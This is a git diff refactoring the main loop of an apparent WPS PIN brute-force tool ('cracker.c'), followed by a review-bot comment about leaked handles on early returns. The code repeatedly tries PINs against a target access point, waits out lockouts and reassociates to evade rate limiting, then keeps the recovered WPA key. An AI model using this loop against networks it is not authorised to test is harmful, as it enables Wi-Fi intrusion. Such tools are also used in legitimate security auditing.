cracker: remove indent level
parent
c6baab313d
commit
231df4a616
355
src/cracker.c
355
src/cracker.c
|
@ -58,219 +58,216 @@ void crack()
|
|||
/* Initialize network interface */
|
||||
set_handle(capture_init(get_iface()));
|
||||
|
||||
if(get_handle() != NULL)
|
||||
if(get_handle() == NULL) {
|
||||
cprintf(CRITICAL, "[-] Failed to initialize interface '%s'\n", get_iface());
|
||||
return;
|
||||
}
|
||||
generate_pins();
|
||||
|
||||
/* Restore any previously saved session */
|
||||
if(get_static_p1() == NULL || !get_pin_string_mode())
|
||||
{
|
||||
generate_pins();
|
||||
/* Check the specified 4/8 digit WPS PIN has been already tried */
|
||||
if (restore_session() == -1) return;
|
||||
}
|
||||
|
||||
/* Restore any previously saved session */
|
||||
if(get_static_p1() == NULL || !get_pin_string_mode())
|
||||
/* Convert BSSID to a string */
|
||||
bssid = mac2str(get_bssid(), ':');
|
||||
|
||||
/*
|
||||
* We need to get some basic info from the AP, and also want to make sure the target AP
|
||||
* actually exists, so wait for a beacon packet
|
||||
*/
|
||||
cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid);
|
||||
read_ap_beacon();
|
||||
cprintf(INFO, "[+] Received beacon from %s\n", bssid);
|
||||
char *vendor;
|
||||
if((vendor = get_vendor_string(get_vendor())))
|
||||
cprintf(INFO, "[+] Vendor: %s\n", vendor);
|
||||
/* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */
|
||||
if(get_max_pin_attempts() == -1)
|
||||
{
|
||||
cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
|
||||
return;
|
||||
}
|
||||
|
||||
#if 0
|
||||
/* This initial association is just to make sure we can successfully associate */
|
||||
while(!reassociate())
|
||||
{
|
||||
if(assoc_fail_count == MAX_ASSOC_FAILURES)
|
||||
{
|
||||
/* Check the specified 4/8 digit WPS PIN has been already tried */
|
||||
if (restore_session() == -1) return;
|
||||
assoc_fail_count = 0;
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
}
|
||||
else
|
||||
{
|
||||
assoc_fail_count++;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
|
||||
/* Convert BSSID to a string */
|
||||
bssid = mac2str(get_bssid(), ':');
|
||||
/* Used to calculate pin attempt rates */
|
||||
start_time = time(NULL);
|
||||
|
||||
/* If the key status hasn't been explicitly set by restore_session(), ensure that it is set to KEY1_WIP */
|
||||
if(get_key_status() <= KEY1_WIP)
|
||||
{
|
||||
set_key_status(KEY1_WIP);
|
||||
}
|
||||
/*
|
||||
* If we're starting a session at KEY_DONE, that means we've already cracked the pin and the AP is being re-attacked.
|
||||
* Re-set the status to KEY2_WIP so that we properly enter the main cracking loop.
|
||||
*/
|
||||
else if(get_key_status() == KEY_DONE)
|
||||
{
|
||||
set_key_status(KEY2_WIP);
|
||||
}
|
||||
|
||||
/* Main cracking loop */
|
||||
for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++)
|
||||
{
|
||||
/*
|
||||
* Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
|
||||
* registrar requests. Using a delay here can help prevent the AP from locking us out.
|
||||
*/
|
||||
pcap_sleep(get_delay());
|
||||
|
||||
/* Users may specify a delay after x number of attempts */
|
||||
if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Entering recurring delay of %d seconds\n", get_recurring_delay());
|
||||
pcap_sleep(get_recurring_delay());
|
||||
sleep_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* We need to get some basic info from the AP, and also want to make sure the target AP
|
||||
* actually exists, so wait for a beacon packet
|
||||
* Some APs identify brute force attempts and lock themselves for a short period of time (typically 5 minutes).
|
||||
* Verify that the AP is not locked before attempting the next pin.
|
||||
*/
|
||||
cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid);
|
||||
read_ap_beacon();
|
||||
cprintf(INFO, "[+] Received beacon from %s\n", bssid);
|
||||
char *vendor;
|
||||
if((vendor = get_vendor_string(get_vendor())))
|
||||
cprintf(INFO, "[+] Vendor: %s\n", vendor);
|
||||
/* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */
|
||||
if(get_max_pin_attempts() == -1)
|
||||
while(get_ignore_locks() == 0 && is_wps_locked())
|
||||
{
|
||||
cprintf(WARNING, "[!] WARNING: Detected AP rate limiting, waiting %d seconds before re-checking\n", get_lock_delay());
|
||||
pcap_sleep(get_lock_delay());
|
||||
|
||||
}
|
||||
|
||||
/* Initialize wps structure */
|
||||
set_wps(initialize_wps_data());
|
||||
if(!get_wps())
|
||||
{
|
||||
cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
|
||||
return;
|
||||
cprintf(CRITICAL, "[-] Failed to initialize critical data structure\n");
|
||||
break;
|
||||
}
|
||||
|
||||
#if 0
|
||||
/* This initial association is just to make sure we can successfully associate */
|
||||
while(!reassociate())
|
||||
{
|
||||
/* Try the next pin in the list */
|
||||
pin = build_next_pin();
|
||||
if(!pin)
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to generate the next payload\n");
|
||||
break;
|
||||
}
|
||||
else
|
||||
{
|
||||
cprintf(WARNING, "[+] Trying pin \"%s\"\n", pin);
|
||||
}
|
||||
|
||||
/*
|
||||
* Reassociate with the AP before each WPS exchange. This is necessary as some APs will
|
||||
* severely limit our pin attempt rate if we do not.
|
||||
*/
|
||||
assoc_fail_count = 0;
|
||||
while(!reassociate())
|
||||
{
|
||||
if(assoc_fail_count == MAX_ASSOC_FAILURES)
|
||||
{
|
||||
assoc_fail_count = 0;
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
}
|
||||
else
|
||||
{
|
||||
assoc_fail_count++;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
}
|
||||
cprintf(INFO, "[+] Associated with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
|
||||
/* Used to calculate pin attempt rates */
|
||||
start_time = time(NULL);
|
||||
|
||||
/* If the key status hasn't been explicitly set by restore_session(), ensure that it is set to KEY1_WIP */
|
||||
if(get_key_status() <= KEY1_WIP)
|
||||
{
|
||||
set_key_status(KEY1_WIP);
|
||||
}
|
||||
/*
|
||||
* If we're starting a session at KEY_DONE, that means we've already cracked the pin and the AP is being re-attacked.
|
||||
* Re-set the status to KEY2_WIP so that we properly enter the main cracking loop.
|
||||
* Enter receive loop. This will block until a receive timeout occurs or a
|
||||
* WPS transaction has completed or failed.
|
||||
*/
|
||||
else if(get_key_status() == KEY_DONE)
|
||||
{
|
||||
set_key_status(KEY2_WIP);
|
||||
}
|
||||
result = do_wps_exchange();
|
||||
|
||||
/* Main cracking loop */
|
||||
for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++)
|
||||
switch(result)
|
||||
{
|
||||
/*
|
||||
* Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
|
||||
* registrar requests. Using a delay here can help prevent the AP from locking us out.
|
||||
* If the last pin attempt was rejected, increment
|
||||
* the pin counter, clear the fail counter and move
|
||||
* on to the next pin.
|
||||
*/
|
||||
pcap_sleep(get_delay());
|
||||
|
||||
/* Users may specify a delay after x number of attempts */
|
||||
if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Entering recurring delay of %d seconds\n", get_recurring_delay());
|
||||
pcap_sleep(get_recurring_delay());
|
||||
sleep_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* Some APs identify brute force attempts and lock themselves for a short period of time (typically 5 minutes).
|
||||
* Verify that the AP is not locked before attempting the next pin.
|
||||
*/
|
||||
while(get_ignore_locks() == 0 && is_wps_locked())
|
||||
{
|
||||
cprintf(WARNING, "[!] WARNING: Detected AP rate limiting, waiting %d seconds before re-checking\n", get_lock_delay());
|
||||
pcap_sleep(get_lock_delay());
|
||||
|
||||
}
|
||||
|
||||
/* Initialize wps structure */
|
||||
set_wps(initialize_wps_data());
|
||||
if(!get_wps())
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to initialize critical data structure\n");
|
||||
break;
|
||||
}
|
||||
|
||||
/* Try the next pin in the list */
|
||||
pin = build_next_pin();
|
||||
if(!pin)
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to generate the next payload\n");
|
||||
break;
|
||||
}
|
||||
else
|
||||
{
|
||||
cprintf(WARNING, "[+] Trying pin \"%s\"\n", pin);
|
||||
}
|
||||
|
||||
/*
|
||||
* Reassociate with the AP before each WPS exchange. This is necessary as some APs will
|
||||
* severely limit our pin attempt rate if we do not.
|
||||
*/
|
||||
assoc_fail_count = 0;
|
||||
while(!reassociate())
|
||||
{
|
||||
if(assoc_fail_count == MAX_ASSOC_FAILURES)
|
||||
{
|
||||
assoc_fail_count = 0;
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
}
|
||||
else
|
||||
{
|
||||
assoc_fail_count++;
|
||||
}
|
||||
}
|
||||
cprintf(INFO, "[+] Associated with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
|
||||
|
||||
/*
|
||||
* Enter receive loop. This will block until a receive timeout occurs or a
|
||||
* WPS transaction has completed or failed.
|
||||
*/
|
||||
result = do_wps_exchange();
|
||||
|
||||
switch(result)
|
||||
{
|
||||
/*
|
||||
* If the last pin attempt was rejected, increment
|
||||
* the pin counter, clear the fail counter and move
|
||||
* on to the next pin.
|
||||
*/
|
||||
case KEY_REJECTED:
|
||||
fail_count = 0;
|
||||
pin_count++;
|
||||
advance_pin_count();
|
||||
break;
|
||||
/* Got it!! */
|
||||
case KEY_ACCEPTED:
|
||||
break;
|
||||
/* Unexpected timeout or EAP failure...try this pin again */
|
||||
default:
|
||||
cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), re-trying last pin\n", result);
|
||||
fail_count++;
|
||||
break;
|
||||
}
|
||||
|
||||
/* If we've had an excessive number of message failures in a row, print a warning */
|
||||
if(fail_count == WARN_FAILURE_COUNT)
|
||||
{
|
||||
cprintf(WARNING, "[!] WARNING: %d failed connections in a row\n", fail_count);
|
||||
case KEY_REJECTED:
|
||||
fail_count = 0;
|
||||
pcap_sleep(get_fail_delay());
|
||||
}
|
||||
|
||||
/* Display status and save current session state every DISPLAY_PIN_COUNT loops */
|
||||
if(loop_count == DISPLAY_PIN_COUNT)
|
||||
{
|
||||
save_session();
|
||||
display_status(pin_count, start_time);
|
||||
loop_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* The WPA key and other settings are stored in the globule->wps structure. If we've
|
||||
* recovered the WPS pin and parsed these settings, don't free this structure. It
|
||||
* will be freed by wpscrack_free() at the end of main().
|
||||
*/
|
||||
if(get_key_status() != KEY_DONE)
|
||||
{
|
||||
wps_deinit(get_wps());
|
||||
set_wps(NULL);
|
||||
}
|
||||
/* If we have cracked the pin, save a copy */
|
||||
else
|
||||
{
|
||||
set_pin(pin);
|
||||
}
|
||||
free(pin);
|
||||
pin = NULL;
|
||||
|
||||
/* If we've hit our max number of pin attempts, quit */
|
||||
if((get_max_pin_attempts() > 0) &&
|
||||
(pin_count == get_max_pin_attempts()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts());
|
||||
pin_count++;
|
||||
advance_pin_count();
|
||||
break;
|
||||
/* Got it!! */
|
||||
case KEY_ACCEPTED:
|
||||
break;
|
||||
/* Unexpected timeout or EAP failure...try this pin again */
|
||||
default:
|
||||
cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), re-trying last pin\n", result);
|
||||
fail_count++;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(bssid) free(bssid);
|
||||
if(get_handle())
|
||||
/* If we've had an excessive number of message failures in a row, print a warning */
|
||||
if(fail_count == WARN_FAILURE_COUNT)
|
||||
{
|
||||
pcap_close(get_handle());
|
||||
set_handle(NULL);
|
||||
cprintf(WARNING, "[!] WARNING: %d failed connections in a row\n", fail_count);
|
||||
fail_count = 0;
|
||||
pcap_sleep(get_fail_delay());
|
||||
}
|
||||
}
|
||||
else
|
||||
|
||||
/* Display status and save current session state every DISPLAY_PIN_COUNT loops */
|
||||
if(loop_count == DISPLAY_PIN_COUNT)
|
||||
{
|
||||
save_session();
|
||||
display_status(pin_count, start_time);
|
||||
loop_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* The WPA key and other settings are stored in the globule->wps structure. If we've
|
||||
* recovered the WPS pin and parsed these settings, don't free this structure. It
|
||||
* will be freed by wpscrack_free() at the end of main().
|
||||
*/
|
||||
if(get_key_status() != KEY_DONE)
|
||||
{
|
||||
wps_deinit(get_wps());
|
||||
set_wps(NULL);
|
||||
}
|
||||
/* If we have cracked the pin, save a copy */
|
||||
else
|
||||
{
|
||||
set_pin(pin);
|
||||
}
|
||||
free(pin);
|
||||
pin = NULL;
|
||||
|
||||
/* If we've hit our max number of pin attempts, quit */
|
||||
if((get_max_pin_attempts() > 0) &&
|
||||
(pin_count == get_max_pin_attempts()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts());
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(bssid) free(bssid);
|
||||
if(get_handle())
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to initialize interface '%s'\n", get_iface());
|
||||
pcap_close(get_handle());
|
||||
set_handle(NULL);
|
||||
}
|
||||
}
|
||||
|
||||
|
|
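Review bot: The early `return;` in the blacklist branch (`if(get_max_pin_attempts() == -1)`) runs after `set_handle(capture_init(get_iface()))` has opened the capture handle and after `bssid = mac2str(get_bssid(), ':')` has allocated, so neither the `if(bssid) free(bssid);` nor the `pcap_close(get_handle()); set_handle(NULL);` tail executes; the `if (restore_session() == -1) return;` likewise exits with the handle still open. Now that the outer `if(get_handle() != NULL)` nesting is gone, the tail is the natural single exit: change those early returns to `goto out;` and label the tail `out:` immediately before `if(bssid) free(bssid);`. That is only safe if `bssid` is initialised to NULL at its declaration, which sits outside the hunk together with the start of crack(); if it is not, free it explicitly in the blacklist branch instead. The `if(bssid)` guard is redundant in any case, since `free(NULL)` is a no-op.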